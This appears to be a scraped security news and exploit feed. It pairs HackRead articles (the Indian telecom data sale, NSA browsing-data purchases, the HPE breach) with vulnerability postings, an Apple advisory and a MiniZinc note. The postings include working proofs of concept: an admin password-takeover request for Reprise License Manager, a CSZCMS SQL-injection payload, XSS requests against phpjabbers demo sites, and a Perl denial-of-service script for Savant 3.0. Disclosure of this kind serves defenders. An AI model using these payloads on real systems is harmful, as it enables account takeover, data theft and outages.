By Deeba Ahmed
Two groups of threat actors, namely CYBO CREW and UNIT8200, are apparently selling the same database with a price tag of $3,000.
This is a post from HackRead.com Read the original post: Threat Actors Selling 1.8TB Database of Indian Mobile Users

The database holds personal records of over 750 million Indian citizens, accounting for nearly half of the country’s 1.4 billion population.

A massive yet alleged data breach has reportedly exposed the personal information of millions worldwide, encompassing 85% of the Indian population, marking it as the largest-ever breach of its kind.

Indian cybersecurity firm CloudSEK has reported a staggering data leak exposing personal information, including names, mobile numbers, addresses, and the unique 12-digit Aadhaar card numbers, of 750 million Indians, roughly half of the country’s population of 1.4 billion.

The breach affects mobile network subscribers across multiple countries, posing significant privacy and data security concerns. This compromised database contains security-sensitive information, claim CloudSEK researchers, and has been compressed to 600GB from 1.8TB when uncompressed.

CloudSEK’s investigation of a trove of personally identifiable information (PII) in the database revealed the breach has impacted all major telecom providers but Indian users are at a higher risk, due to the exposure of their unique Aadhaar identification number, raising concerns about identity theft, financial fraud, and cybercrime.

The database is being sold on Telegram and Breach Forums, a well-known platform for hackers and cybercrime activities. Interestingly, this forum recently saw another threat actor leaking a database from Hathway, which contained information from 4 million users.

In fact, two different cybercrime groups, including CYBO CREW-affiliated CyboDevil and UNIT8200 are offering the data for sale for $3,000.

CloudSEK reports that the threat actor selling the data has denied involvement in this data breach and claims to have obtained it through law enforcement channels’ undisclosed asset work, however, the source remains unclear.

Screenshot shows details of what the group is selling (Credit: CloudSEK)

For your information, CYBOCREW is an emerging new threat group, first discovered in July 2023. The group has so far targeted organizations in the automobile, jewellery, insurance, and apparel sectors, conducting major breaches.  CyboDevil and UNIT8200 are amongst its most active affiliates.

CloudSEK’s Sparsh Kulshrestha highlighted that the “magnitude” of this data breach is unprecedented, emphasizing the importance of telecom service providers and the government to devise measures for identifying potential security vulnerabilities beforehand to prevent such attacks.

Users are advised to change passwords, be cautious of phishing, monitor accounts, and report suspicious activity after a breach, especially those linked to mobile numbers or Aadhaar, to protect their information. CloudSEK has responsibly notified impacted parties and relevant authorities regarding the data breach.

1.  **Indian ISP Hathway Data Breach: Hacker Leaks 4M User Data**
2.  **iPhone Hack Attack Warnings Spark Political Firestorm in India**
3.  **Hacker Leaks 73M Records from Indian HDFC Bank Subsidiary**
4.  **Indian Ticketing Platform RailYatri Hacked – 31 Million Impacted**
5.  **India’s Largest Truck Brokerage Company Leaking 140GB of Data**

Threat Actors Selling 1.8TB Database of Indian Mobile Users

By Deeba Ahmed
From Snowden to Shady Markets: The Long History of NSA's Unchecked Surveillance.
This is a post from HackRead.com Read the original post: NSA Admits Buying American Browsing Records From Shady Markets

According to a letter from NSA director Paul Nakasone to Wyden, the agency purchased Netflow data and information from electronic devices used both domestically and internationally.

The US National Security Agency (NSA) has confirmed purchasing American users’ internet browsing records without warrants, according to Oregon Democratic Senator Ron Wyden. Congressman Wyden, a staunch privacy advocate, spent three years attempting to disclose the NSA’s practice, including purchasing smartphone location data without a warrant.

These “warrantless purchases” included information about websites visited and apps used, explained Wyden. This means, that US government agencies frequently access commercial marketplaces to gather sensitive information about Americans without obtaining court warrants.

According to a letter from NSA director Paul Nakasone to Wyden, the agency only purchased Netflow data and information from electronic devices used both domestically and internationally. The data, mainly related to Internet communications, did not include American communications content. The NSA claims to use commercially available Netflow data for cybersecurity and foreign intelligence missions, to defend US military networks from foreign hackers, minimizing the collection of U.S. personal information through technical filters.

In a letter to the Director of National Intelligence (DNI), Avril Haines, Wyden has urged the Biden administration to stop this “warrantless surveillance of Americans” through internet data purchases. He argues that the US government should not fund and legitimize a shady industry, raising questions about its legality.

“The U.S. government should not be funding and legitimizing a shady industry whose flagrant violations of Americans’ privacy are not just unethical, but illegal.”

Collecting user browsing habits metadata is a risky practice as it can expose personal information on websites related to mental health, sexual assault, domestic abuse, and telehealth, posing a significant privacy risk.

It must be noted that the Federal Trade Commission (FTC) has banned Outlogic (previously called X-Mode Social) and InMarket Media from selling location information without users’ informed consent, also barring Outlogic from collecting location data for sensitive locations like medical clinics and religious places.

Purchasing data from companies falling in the legal gray area is unethical as consumers/users are unaware of how it’ll be shared or used. Third-party apps incorporating SDKs from these brokers do not inform users about location data sales for advertising or national security purposes, either.

The revelation comes amid growing concerns about foreign governments acquiring US citizens’ data. The Biden administration is already preparing an executive order to curb such purchases, reports CNN. But the government itself is involved in such practices.

However, the NSA has a history of mass surveillance practices, therefore, Wyden’s disclosure doesn’t seem surprising. Back in 2015, a lawsuit was filed by Wikipedia against the NSA to protect the rights of its 500 million monthly users, arguing that their mass surveillance potentially violates the Fourth Amendment and First Amendment and that their activities exceed the authority granted by the Foreign Intelligence Surveillance Act.

Ex NSA contractor Edward Snowden’s 2013 revelation of a secret NSA mass surveillance program, which has been secret for over a decade created havoc globally, exposing the agency’s spying practices.

In 2015, a three-judge panel of the Second Circuit Court of Appeals ruled that the agency’s telephone metadata collection program, which gathered millions of American citizens’ phone records daily, is illegal under the Patriot Act.

****_RELATED ARTICLES_****

1.  **How Dutch Police Busted Hansa Dark Web Marketplace**
2.  **Snowden Explains Why Telegram Messenger App is Unsafe**
3.  **Prometei botnet uses NSA exploit, hits MS exchange servers**
4.  **Hacker uses NSA-reported Windows 10 vulnerability to troll NSA**
5.  **Baltimore City ransomware attack powered by stolen NSA hacking tool**

NSA Admits Buying American Browsing Records From Shady Markets

Reprise License Manager version 15.1 suffers from privilege escalation and arbitrary file write vulnerabilities.

    Multiple Vulnerabilities in Reprise License Manager 15.1 (CVE-2023-43183, CVE-2023-44031)Credit: Mohaiman Rahim/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////# Product:  RLM 15.1# Vendor:   Reprise Software# CVE ID:   CVE-2023-43183# Vulnerability Title: Incorrect Access Control (leading to PrivEsc)# Severity:  High# Author(s): Mohaiman Rahim# Date:     2024-01-14##############################################################Introduction:Reprise License Manager 15.1 is affected by an incorrect access control vulnerability which allows low level users, such as read-only users, to arbitrarily change the password of an admin and hijack their account.Vulnerability PoC:This vulnerability can be demonstrated by modifying the "user" POST parameter at http://HOST:5054/change_password_process with the username of a target user (such as an Admin account).When executed this will result in the password of the targeted user being changed and the account therefore being compromised.////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////# Product:  RLM 15.1# Vendor:   Reprise Software# CVE ID:   CVE-2023-44031# Vulnerability Title: Incorrect Access Control (leading to arbitrary file write)# Severity:  High# Author(s): Mohaiman Rahim# Date:     2024-01-14##############################################################Introduction:Reprise License Manager 15.1 is affected by an incorrect access control vulnerability which allows a user to perform privileged web application functions, such as a function that generates system information.This vulnerability can be exploited to be able to change the path of where the diagnostics file should be saved via a crafted HTTP POST request.This can allow an attacker to save the diagnostics file, containing system information, in insecure locations.Vulnerability PoC:This vulnerability can be demonstrated by modifying the "outputfile" POST parameter at http://HOST:5054/diagnostics_doit to an insecure path accessible by local users such as "C:\temp".Deloitte Disclaimer: Deloitte refers to a Deloitte member firm, one of its related entities, or Deloitte Touche Tohmatsu Limited ("DTTL"). Each Deloitte member firm is a separate legal entity and a member of DTTL. DTTL does not provide services to clients. Please see www.deloitte.com/about to learn more. Deloitte Statsautoriseret Revisionspartnerselskab, CVR-nr. 33 96 35 56 This message (including any attachments) contains confidential information intended for a specific individual and purpose, and is protected by law. If you are not the intended recipient, you should delete this message and are hereby notified that any disclosure, copying, or distribution of this message, or the taking of any action based on it, is strictly prohibited.

Reprise License Manager 15.1 Privilege Escalation / File Write

CSZCMS version 1.3.0 suffers from a remote SQL injection vulnerability in the admin flows.

    # Title:  CSZCMS v1.3.0 - SQL Injection# Author: Abdulaziz Almetairy# Date: 27/01/2024# Vendor: https://www.cszcms.com/# Software: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.3.0.zip/download# Reference: https://github.com/oh-az# Tested on: Windows 11, MySQL, Apache# 1 - Log in to the admin portalhttp://localhost/cszcms/admin/login# 2 - Navigate to General Menu > Member Users.# 3 Click the 'View' button next to any username.# 4 Intercept the requestGET /cszcms/admin/members/view/1 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeCookie: 86112035d26bb3c291899278f9ab4fb2_cszsess=n5v1jcdqfjuuo32ng66e4rttg65ugdssUpgrade-Insecure-Requests: 1# 5 Modify the paramter /cszcms/admin/members/view/1to /cszcms/admin/members/view/'or(sleep(10))#and url encode all characters/cszcms/admin/members/view/%27%6f%72%28%73%6c%65%65%70%28%31%30%29%29%23%20Impact: Exploiting this SQL injection vulnerability allows an attacker to read sensitive data, enumerate database structures, and potentially cause denial of service through time-based SQL injection by manipulating queries to exploit delays in the application's response.Fix: Implement rigorous input validation and exclusively utilize prepared statements to prevent SQL injection vulnerabilities.

CSZCMS 1.3.0 SQL Injection

Interactive Floor Plan version 1.0 suffers from a cross site scripting vulnerability.

    ## Title: Interactive-Floor-Plan-1.0-XSS-Reflected-SESSION-Hijacking## Author: nu11secur1ty## Date: 01/28/2024## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/interactive-floor-plan-software/#sectionDemo## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the action request parameter is copied into the HTMLdocument as plain text between tags. The payload epe7x<img src=aonerror=alert(1)>aagqb was submitted in the action parameter. Thisinput was echoed unmodified in the application's response. Theattacker can steal session cookies etc.STATUS: HIGH - Vulnerability[+]Exploit:```GETGET /1706426767_110/index.php?controller=pjFront&action=pjActionLoadCssepe7x%3cimg%20src%3da%20onerror%3dalert(1)%3eaagqbHTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflate, brAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85Safari/537.36Connection: closeCache-Control: max-age=0Cookie: _ga=GA1.2.809339229.1706427310;_gid=GA1.2.1556395590.1706427310; _gat=1;_fbp=fb.1.1706427309936.1280956215;_ga_NME5VTTGTT=GS1.2.1706427311.1.0.1706427311.60.0.0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2024/Interactive-Floor-Plan-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/01/interactive-floor-plan-10-xss-reflected.html)## Time spent:00:35:00

Interactive Floor Plan 1.0 Cross Site Scripting

PHPJ Callback Widget version 1.0 suffers from a persistent cross site scripting vulnerability.

    ## Title: PHPJ-Callback-Widget-1.0-XSS-Stored-admin-Hijacking## Author: nu11secur1ty## Date: 01/26/2024## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/callback-widget/## Reference: https://portswigger.net/web-security/cross-site-scripting## Description:The Callback Requests function is vulnerable to javascript injection.The malicious user from everywhere can send an XSs-stored exploit codeto the admin panel, and then when the admin visits the API CallbackRequests function he will immediately activate the exploitation of themalicious actor. This is so fun, thanks for watching the PoC video. =)BRSTATUS: HIGH-Vulnerability[+]Exploit:```POSTPOST /1706261102_419/index.php?controller=pjFront&action=pjActionSave HTTP/1.1Host: demo.phpjabbers.comCookie: _ga=GA1.2.2069938240.1692907228;_fbp=fb.1.1705479327501.84379277;_ga_NME5VTTGTT=GS1.2.1705493664.10.1.1705493702.22.0.0;CallbackWidget=irnrkmih5bc4ehc7fcgbc8ql84Content-Length: 322Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"Accept: */*Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.216Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://demo.phpjabbers.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://demo.phpjabbers.com/1706261102_419/preview.php?theme=theme1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=1, iConnection: closereason_id=2&name=%3Ca+href%3D%22https%3A%2F%2Fwww.pornhub.com%22+target%3D%22_blank%22%3E+%09%3Cimg+src%3D%22https%3A%2F%2Fel.phncdn.com%2Fgif%2F45467111.gif%22+alt%3D%22STUPID%22width%3D%22900%22+height%3D%22450%22%3E+%3C%2Fa%3E&email=hack%40hack.com&phone=1234567890&besttime=30-01-2024+11%3A30&timezone=0&captcha=VIXFWL```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2024/Callback-Widget-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/01/phpj-callback-widget-10-xss-reflected.html)## Time spent:00:15:00

PHPJ Callback Widget 1.0 Cross Site Scripting

Savant version 3.0 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket;

# Exploit Title: Savant 3.0 - Denied of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 27 january 2024  
#https://sourceforge.net/projects/savant/files/Savant/3.0/Savant30.exe/download  
# Download to demo: https://drive.google.com/file/d/18m_wzC8EOSB8lHPc1DexpOfsDm7H8RFs/view?usp=sharing      
# Notification vendor: No reported  
# Tested Version: Savant 3.0 - Denied of Service (DoS)  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denied of Service (DoS)

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The web server does not correctly handle the amount of data or bytes sent to command RNTO.  
#When authenticating to the web server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing Denied of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

    my $sc = "\x90" x 245;

    my $buf = "\x41\x41" . " /" . $sc."\r\n\r\n";

my $s = IO::Socket::INET->new(PeerAddr => $ip, PeerPort => $por, Proto => 'tcp') or exit;  
$s->send($buf);  
close $s;

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print q {

                            _/|       
                           // o\      
                           || ._)    
                           //__\     
                           )___(   

      [+] Savant 3.0 - Denied of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: fernando.mengalli@gmail.com

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

Savant 3.0 Denial Of Service

Apple Security Advisory 01-22-2024-6 - macOS Ventura 13.6.4 addresses bypass and code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-01-22-2024-6 macOS Ventura 13.6.4

macOS Ventura 13.6.4 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214058.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Apple Neural Engine  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23212: Ye Zhang of Baidu Security

Accessibility  
Available for: macOS Ventura  
Impact: An app may be able to access sensitive user data  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-42937: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)

Core Data  
Available for: macOS Ventura  
Impact: An app may be able to bypass Privacy preferences  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2023-40528: Kirin (@Pwnrin) of NorthSea

curl  
Available for: macOS Ventura  
Impact: Multiple issues in curl  
Description: Multiple issues were addressed by updating to curl version  
8.4.0.  
CVE-2023-38545  
CVE-2023-38039  
CVE-2023-38546  
CVE-2023-42915

Finder  
Available for: macOS Ventura  
Impact: An app may be able to access sensitive user data  
Description: The issue was addressed with improved checks.  
CVE-2024-23224: Brian McNulty

ImageIO  
Available for: macOS Ventura  
Impact: Processing a maliciously crafted image may result in disclosure  
of process memory  
Description: The issue was addressed with improved checks.  
CVE-2023-42888: Michael DePlante (@izobashi) of Trend Micro Zero Day  
Initiative

LoginWindow  
Available for: macOS Ventura  
Impact: A local attacker may be able to view the previous logged in  
user’s desktop from the fast user switching screen  
Description: An authentication issue was addressed with improved state  
management.  
CVE-2023-42935

Mail Search  
Available for: macOS Ventura  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-23207: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab), and  
Ian de Marcellus

NSOpenPanel  
Available for: macOS Ventura  
Impact: An app may be able to read arbitrary files  
Description: An access issue was addressed with additional sandbox  
restrictions.  
CVE-2023-42887: Ron Masas of BreakPoint.sh

WebKit  
Available for: macOS Ventura  
Impact: Processing maliciously crafted web content may lead to arbitrary  
code execution. Apple is aware of a report that this issue may have been  
exploited.  
Description: A type confusion issue was addressed with improved checks.  
WebKit Bugzilla: 267134  
CVE-2024-23222

macOS Ventura 13.6.4 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmWvDk0ACgkQX+5d1TXa  
IvrWTw/8DbDE/5ejAyR2F08VphoiOnJD5URY5WINPWVWps0w9svMI83Ig+MLlbVY  
APek5kQlSVJJoI7RXrSxgRCs3gcWVWVo08iVIM6woBbsd5JPaTYXe9/yUdRzWBX4  
zgOxvCh5wL4czXUV0ym4OMlDE5BZ3N+hEpyAIOJmNV7jkNnMshMWfeN6puFZgwt/  
FYt1BrU+MJ4PRA/A3B01ic3VQFnHifCE1jF/ebfb7DwZafK6EO2Hf91MNgAic5Td  
Q4TvwnHOqAq1N0cZa+SKNsStVx5Yk4J0ovNeecdQA2xNVfnd7jLaU1Y57SHjxNi9  
wbsENC3bTpZed+lMhDiBaRIj//Ej6KMeQKUNbcvPH5HCHP5YN68QFwkoA+QJdX66  
SH7jvDI6xgjlvVoNjqZ6bYHDr+CK5AB7fLDXhEGWBIssjce8AeaNPPA7JHMsVCen  
o7WXri4Bb7W4BwfpicTPlumkF+vva+nKYWvuAfob7v2yayeCa8vPKgrEPHXbCnWa  
8r1lqyQVqKL1wqS5RcpsHZEWrV2HF0hoKam4x3ZmLqNDhnVC0t8IipL0vqN+vzaU  
t26QZrpiW8V7CZRiXeCj5rDhv8Z1w+wEiuGLTqp9Z1JD/mCVy7Tmm2Y6RNYZw+jk  
lwpJpwqOpXbsCdx6kU28V8H1elS5cz3RdGCDex55lOlrMXp+KOs=  
=VoRh  
-----END PGP SIGNATURE-----

Apple Security Advisory 01-22-2024-6

MiniZinc version 2.7.6 suffers from a null pointer vulnerability.

**MiniZinc 2.7.6 Null Pointer**

Posted Jan 29, 2024

Authored by Meng Ruijie

MiniZinc version 2.7.6 suffers from a null pointer vulnerability.

tags | advisory

advisories | CVE-2023-46050

SHA-256 | a80cb0270b834776631af2ca8f8daa61229fb0418cf1801a697093adfbf995c9

Download | Favorite | View

**MiniZinc 2.7.6 Null Pointer**

    [Vulnerability description]A null pointer deference existed in MiniZinc v.2.7.6 via a crafted Preferences.json file.[VulnerabilityType Other]null pointer deference[Vendor of Product]MiniZinc[Affected Product Code Base]MiniZinc - 2.7.6[Reference]https://github.com/MiniZinc/libminizinc/issues/729[CVE Reference]The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2023-46050 to this vulnerability.

**File Tags**

*   ActiveX (932)
*   Advisory (83,946)
*   Arbitrary (16,508)
*   BBS (2,859)
*   Bypass (1,810)
*   CGI (1,031)
*   Code Execution (7,521)
*   Conference (685)
*   Cracker (843)
*   CSRF (3,365)
*   DoS (24,223)
*   Encryption (2,377)
*   Exploit (52,460)
*   File Inclusion (4,241)
*   File Upload (982)
*   Firewall (822)
*   Info Disclosure (2,819)
*   Intrusion Detection (902)
*   Java (3,111)
*   JavaScript (884)
*   Kernel (6,899)
*   Local (14,626)
*   Magazine (586)
*   Overflow (12,942)
*   Perl (1,429)
*   PHP (5,167)
*   Proof of Concept (2,359)
*   Protocol (3,677)
*   Python (1,585)
*   Remote (31,191)
*   Root (3,610)
*   Rootkit (517)
*   Ruby (615)
*   Scanner (1,646)
*   Security Tool (7,948)
*   Shell (3,224)
*   Shellcode (1,216)
*   Sniffer (898)
*   Spoof (2,236)
*   SQL Injection (16,468)
*   TCP (2,420)
*   Trojan (687)
*   UDP (896)
*   Virus (667)
*   Vulnerability (32,325)
*   Web (9,813)
*   Whitepaper (3,763)
*   x86 (966)
*   XSS (18,088)
*   Other

**File Archives**

*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,058)
*   BSD (375)
*   CentOS (57)
*   Cisco (1,926)
*   Debian (6,953)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,425)
*   HPUX (880)
*   iOS (369)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (48,371)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (487)
*   RedHat (14,947)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,245)
*   UNIX (9,356)
*   UnixWare (187)
*   Windows (6,620)
*   Other

MiniZinc 2.7.6 Null Pointer

Hewlett Packard Enterprise revealed in a filing that it was breached by Russian group Cozy Bear, similar to Microsoft.

Hewlett Packard Enterprise (HPE) has disclosed that the state-sponsored actor known as Cozy Bear (aka Midnight Blizzard), gained unauthorized access to HPE’s cloud-based email environment.

This news comes only days after Microsoft broke very similar news that it got hacked by this same state sponsored group. Cozy Bear, who is generally linked to the Russian Foreign Intelligence Service, also known as the SVR, seems to be extremely curious to find out the intelligence information several tech giants gathered about it.

HPE stated in a form K-8 filing with the U.S. Securities and Exchange Commission (SEC) that:

> “Based on our investigation, we now believe that the threat actor accessed and exfiltrated data beginning in May 2023 from a small percentage of HPE mailboxes belonging to individuals in our cybersecurity, go-to-market, business segments, and other functions.”

So far, the ongoing investigation showed that HPE’s cloud email environment was compromised in May of 2023, at which point Cozy Bear stole a limited number of SharePoint files.

In a statement to CRN last Wednesday, HPE said the impacted cloud email system was a Microsoft Office 365 environment, and said that the attacker leveraged a compromised account to access the email environment.

The accessed data was limited to information contained in the users’ mailboxes. As the investigation stands now, the company says the incident has not had a material impact on its operations, and is reasonably unlikely to materially impact the company’s financial condition or results of operations.

It is unsure if the Microsoft and HPE incidents are linked. Even though the news came out days apart, the actual incidents were months apart: HPE in May and Microsoft in November. However, in both incidents there is a notable focus on security staff and so it appears that Cozy Bear is trying to find out what information US tech giants have about it.

Without further details though, it’s all speculation. The question is if we will ever hear these details.

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

Tag

#auth